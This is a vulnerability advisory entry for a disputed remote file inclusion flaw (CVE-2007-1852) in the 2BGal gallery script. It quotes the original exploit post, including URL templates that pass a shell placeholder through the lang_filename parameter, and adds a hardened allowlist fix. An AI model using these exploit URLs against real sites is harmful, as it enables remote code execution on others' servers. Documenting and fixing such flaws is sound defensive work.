2BGal Multiple PHP Code Injection Vulnerabilities

Vulnerability ID: 1191110    Vulnerability type: Unknown
Published: 2007-04-03    Updated: 2007-07-03
CVE ID: CVE-2007-1852    CNNVD-ID: CNNVD-200704-070
Platform: N/A    CVSS score: 6.8
|Vulnerability source
https://cxsecurity.com/issue/WLB-2007040025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-070
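|Vulnerability details
**DISPUTED** Multiple PHP remote file inclusion vulnerabilities exist in 2BGal. A remote attacker can execute arbitrary PHP code via a URL in the lang_filename parameter submitted to (1) index.php or (2) backupdb.inc.php.
|Exploit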
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability

Script: 2BGal

Version: 3.1.1

Download: http://www.ben3w.com/multimedia/2bgal.zip

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

admin/index.php   &  backupdb.inc.php   ...... and so on >>

Code:

require($lang_filename);

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~

wWw.site.cOm/[path]/admin/index.php?lang_filename=[ BorN-SHell ]
wWw.site.cOm/[path]/admin/backupdb.inc.php?lang_filename=[ BorN-SHell ]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:

str0ke  -  Dr.2  -  AsbMay  ....

AsbMay's Group  &  Kuwait Security

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

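Added example (not 2BGal's code and not part of the advisory): a hardened alternative to the `require($lang_filename);` pattern quoted above, in which the request only selects a language key from an allowlist and the server builds the path itself. The `lang/` directory, the language names, the `lang` request parameter and the `resolve_lang_file()` helper are assumptions for illustration.

```php
<?php
// Added illustration; directory layout and language names are assumptions.
const LANG_DIR     = __DIR__ . '/lang';      // assumed location of language files
const LANG_ALLOWED = ['english', 'french'];  // assumed set of shipped languages
const LANG_DEFAULT = 'english';

/**
 * Turn an untrusted language selector into a path inside LANG_DIR.
 * Anything that is not an exact allowlist match falls back to the default,
 * so URLs, stream wrappers, traversal sequences and arrays never reach require.
 */
function resolve_lang_file($requested): string
{
    $name = is_string($requested) ? strtolower(trim($requested)) : '';
    if (!in_array($name, LANG_ALLOWED, true)) {
        $name = LANG_DEFAULT;
    }
    return LANG_DIR . '/' . $name . '.inc.php';
}

// Intended use in a page script (parameter name "lang" is an assumption):
//   require resolve_lang_file($_GET['lang'] ?? null);

// Constructed inputs showing which selectors are honoured and which fall back.
if (PHP_SAPI === 'cli') {
    $samples = ['French', 'http://example.invalid/x.txt', '../../config', ['english'], null];
    foreach ($samples as $input) {
        echo json_encode($input), ' => ', basename(resolve_lang_file($input)), PHP_EOL;
    }
}
```

As defence in depth, keep `allow_url_include` set to `Off` in php.ini (its default), which stops `require` and `include` from fetching URLs at all.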
|References

Source: XF
Name: 2bgal-langfilename-file-include(33375)
Link: http://xforce.iss.net/xforce/xfdb/33375
Source: BUGTRAQ
Name: 20070331 2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/464458/100/0/threaded
Source: VIM
Name: 20070427 FALSE -> 2bgal RFI
Link: http://attrition.org/pipermail/vim/2007-April/001565.html
Source: SREASON
Name: 2517
Link: http://securityreason.com/securityalert/2517